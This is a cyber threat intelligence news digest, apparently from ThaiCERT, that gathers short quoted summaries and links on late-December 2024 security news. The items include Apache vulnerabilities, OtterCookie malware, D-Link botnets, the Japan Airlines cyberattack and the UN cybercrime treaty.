Cyber Threat Intelligence 27 December 2024

NCSA_THAICERT

Industrial Sector

Securing Remote OT Operations
"As OT environments become more interconnected, organizations can manage operations remotely, enhancing efficiency and enabling greater oversight even from a distance. However, these advancements come with heightened security risks. A recent report from Palo Alto Networks and ABI Research found that 74% of respondents noticed an increase in remote access, creating more entry points for attackers. This expanded attack surface has made OT systems a prime target for cyber threats, underscoring the need for a robust security framework tailored to remote OT environments."
https://www.paloaltonetworks.com/blog/2024/12/securing-remote-ot-operations/

Government/Law/Policy

UN General Assembly Approves Cybercrime Treaty Despite Industry Backlash
"The United Nations General Assembly adopted a landmark cybercrime convention on Tuesday, paving the way for significant changes to how governments police the internet. The Convention against Cybercrime was adopted without a vote and by consensus after a five-year negotiation. A formal signing ceremony will be held in Hanoi in 2025 and the convention will take force 90 days after being ratified."
https://therecord.media/un-general-assembly-approves-cybercrime-treaty-despite-industry-pushback

Vulnerabilities

Apache Warns Of Critical Flaws In MINA, HugeGraph, Traffic Control
"The Apache Software Foundation has released security updates to address three severe problems that affect MINA, HugeGraph-Server, and Traffic Control products. The vulnerabilities were patched in new software versions released between December 23 and 25. However, the holiday period may lead to a slower patching rate and increased risk of exploitation. One of the bugs is tracked as CVE-2024-52046 and impacts MINA versions 2.0 through 2.0.26, 2.1 through 2.1.9, and 2.2 through 2.2.3. The issue received a critical severity score of 10 out of 10 from the Apache Software Foundation"
https://www.bleepingcomputer.com/news/security/apache-warns-of-critical-flaws-in-mina-hugegraph-traffic-control/

Malware

New 'OtterCookie' Malware Used To Backdoor Devs In Fake Job Offers
"North Korean threat actors are using new malware called OtterCookie in the Contagious Interview campaign that is targeting software developers. Contagious Interview has been active since at least December 2022, according to researchers at cybersecurity company Palo Alto Networks. The campaign targets software developers with fake job offers to deliver malware such as BeaverTail and InvisibleFerret. A report from NTT Security Japan notes that the Contagious Interview operation is now using a new piece of malware called OtterCookie, which was likely introduced in September and with a new variant appearing in the wild in November."
https://www.bleepingcomputer.com/news/security/new-ottercookie-malware-used-to-backdoor-devs-in-fake-job-offers/
Botnets Continue To Target Aging D-Link Vulnerabilities
"FortiGuard Labs noticed a spike in the activity of two different botnets in October and November of 2024. One was the Mirai variant “FICORA,” and the other was the Kaiten variant “CAPSAICIN.” These botnets are frequently spread through documented D-Link vulnerabilities that allow remote attackers to execute malicious commands via a GetDeviceSettings action on the HNAP (Home Network Administration Protocol) interface. This HNAP weakness was first exposed almost a decade ago, with numerous devices affected by a variety of CVE numbers, including CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112."
https://www.fortinet.com/blog/threat-research/botnets-continue-to-target-aging-d-link-vulnerabilities
Defense Giant General Dynamics Says Employees Targeted In Phishing Attack
"Aerospace and defense giant General Dynamics says threat actors compromised dozens of employee benefits accounts after a successful phishing campaign targeting its personnel. The unauthorized activity was discovered on October 10, after the attackers had accessed and made changes to the employee benefits accounts through a login portal hosted by a third party."
https://www.securityweek.com/defense-giant-general-dynamics-says-employees-targeted-in-phishing-attack/

Breaches/Hacks/Leaks

Japan Airlines Cyberattack Disrupts Flights As Holiday Season Begins
"Japan Airlines' network suffered a cyberattack Thursday, disrupting luggage services and delaying flights at the start of the New Year holiday season, before being restored later in the day. The airline said customers could once again purchase tickets for both domestic and international flights after a temporary halt, adding that no personal information was leaked and no damage was caused by computer viruses. JAL said the issues began around 7:25 a.m., delaying more than 60 domestic and international flights by up to four hours and leading to the cancellation of two domestic flights. While ticket sales were temporarily halted, previously made reservations remained valid."
https://english.kyodonews.net/news/2024/12/33b9ee9a0030-urgent-jals-system-under-cyberattack-domestic-and-intl-flights-delayed.html
https://securityaffairs.com/172319/hacking/japan-airlines-hit-cyberattack.html
https://therecord.media/japan-airlines-resumes-operations-after-cyberattack
https://www.securityweek.com/japan-airlines-was-hit-by-a-cyberattack-delaying-flights-during-the-year-end-holiday-season/
https://www.itnews.com.au/news/jals-systems-back-to-normal-after-cyber-attack-614102

General News

DDoS Attacks Surge As Africa Expands Its Digital Footprint
"Rising Internet adoption and digital transformation initiatives are exposing organizations in Africa to a growing range of cyber threats. One manifestation of the trend is a steady increase in distributed denial-of-service (DDoS) attacks on organizations in a handful of North African countries — which also happen to be the ones with the highest Internet penetration rates in the region."
https://www.darkreading.com/cloud-security/ddos-attacks-surge-africa-digital-footprint
Service Disruptions Continue To Blindside Businesses
"Service disruptions remain a critical concern for IT and business executives, with 88% of respondents saying they believe another major incident will occur in the next 12 months, according to PagerDuty. PagerDuty surveyed 1,000 IT and business executives who were director level and above, from the US, UK, Australia and Japan."
https://www.helpnetsecurity.com/2024/12/26/service-disruptions-concern/
iOS Devices More Exposed To Phishing Than Android
"The mobile threat landscape continues to grow at an alarming rate as cybercrime groups shift their tactics and target mobile devices in the early stages of their attacks, according to a recent Lookout report. The report highlights insights behind a 17% increase QoQ (quarter on quarter) in enterprise-focused credential theft and phishing attempts, 32% increase QoQ in malicious app detections and a trend showing iOS devices are more exposed to phishing attacks than Android devices."
https://www.helpnetsecurity.com/2024/12/26/mobile-devices-attacks/
South Korea Sanctions 15 North Koreans For IT Worker Scams, Financial Hacking Schemes
"The South Korean government has sanctioned more than a dozen individuals and one organization for a wide-ranging global scheme to fund North Korea’s nuclear and missile programs through impersonating IT workers abroad, stealing cryptocurrency and facilitating cyberattacks."
https://cyberscoop.com/south-korea-sanctions-north-koreans-it-worker-scams/
Emerging Threats & Vulnerabilities To Prepare For In 2025
"In 2024, we at Dark Reading covered a variety of attacks, exploits, and, of course, vulnerabilities across the board. Here, we recount 10 emerging threats organizations should be prepared for — as detailed by Dr. Jason Clark in "10 Emerging Vulnerabilities Every Enterprise Should Know," a Dark Reading webinar — as they continuously rise and develop in 2025."
https://www.darkreading.com/vulnerabilities-threats/emerging-threats-vulnerabilities-prepare-2025
The Intersection Of AI And OSINT: Advanced Threats On The Horizon
"Intelligence operations have undergone a profound transformation. Gone are the days when intelligence gathering relied purely on information obtained from human and other restricted sources. Today, much of the intelligence is publicly available – if one knows where and how to find it. This practice, known as Open Source Intelligence (OSINT), has emerged as an essential tool, especially in cybersecurity. Traditionally, OSINT proved to be a powerful tool for defenders. Security teams use it to proactively research publicly available information so they can thwart threat actors by preempting their moves. On the flip side, studies reveal that bad actors too have been leveraging OSINT to target organizations and their key executives."
https://www.securityweek.com/the-intersection-of-ai-and-osint-advanced-threats-on-the-horizon/
Brazilian Man Charged With Making Extortionate Threats To Publicize Stolen Data Obtained By Unlawful Computer Intrusion
"A citizen and resident of Brazil was charged with making extortionate threats to publicize data stolen from the Brazilian subsidiary of a New Jersey company, U.S. Attorney Philip R. Sellinger announced. Junior Barros De Oliveira, 29, of Curitiba, Brazil was charged with four counts of extortionate threats involving information obtained from protected computers in violation of Title 18, United States Code, Section 1030(a)(7)(B) and four counts of threatening communications in violation of Title 18, United States Code, Section 875(d) in an indictment unsealed today in Newark federal court."
https://www.justice.gov/usao-nj/pr/brazilian-man-charged-making-extortionate-threats-publicize-stolen-data-obtained
https://thehackernews.com/2024/12/brazilian-hacker-charged-for-extorting.html

อ้างอิง
Electronic Transactions Development Agency(ETDA)